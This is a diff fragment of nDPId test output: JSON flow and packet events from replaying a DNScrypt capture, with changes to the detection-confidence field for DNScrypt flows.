AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":31,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304328} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":31,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAABQHPsAub0RoW4KAAABuYbENwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304328,"pkt":"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"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":59405,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAIcHP1AAL0RYFkKAAABuYbEN8UDIPsCCECUfxsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAXcHP4gAL0RfJgKAAABuYbEN9dTIPsGBAJxfx4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304328} 
00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAABQHP4Aub0RoWsKAAABuYbENwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739304360,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739304360,"pkt":"ZmZmZmZmRERERERECABFAADWmUJAADQRblq5hsQ3CgAAASD7xQMAwuTIfxuAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAADn5TxO0FAodB0MfyNII\/q4yfvBzna8lha8rHqMZH6brB0hzmteXf96oRMNtUVCp592lxf62HHwuDSbhBbtGtQcalorpuHO8PTt\/PSXI1nToKeQ\/\/4xUAF+WFp6Iz9p9KhqWium4c7w9AAAAAV7URQBxousA"} 
@@ -87,24 +87,24 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739304362,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739304362,"pkt":"ZmZmZmZmRERERERECABFAADWmUNAADQRblm5hsQ3CgAAASD70cEAwtgLfxqAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAADn5TxO0FAodB0MfyNII\/q4yfvBzna8lha8rHqMZH6brB0hzmteXf96oRMNtUVCp592lxf62HHwuDSbhBbtGtQcalorpuHO8PTt\/PSXI1nToKeQ\/\/4xUAF+WFp6Iz9p9KhqWium4c7w9AAAAAV7URQBxousA"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAIcylFAAL0RDRQKAAABaO66wK6oAbsCCOaEZFgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739304363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304363,"pkt":"REREREREZmZmZmZmCABFAAXcylIgAL0RKVMKAAABaO66wN6lAbsGBMqkZFUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAF2CGRuc2NyeXB0AnVrAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304363,"flow_last_seen":946739304363,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304363,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 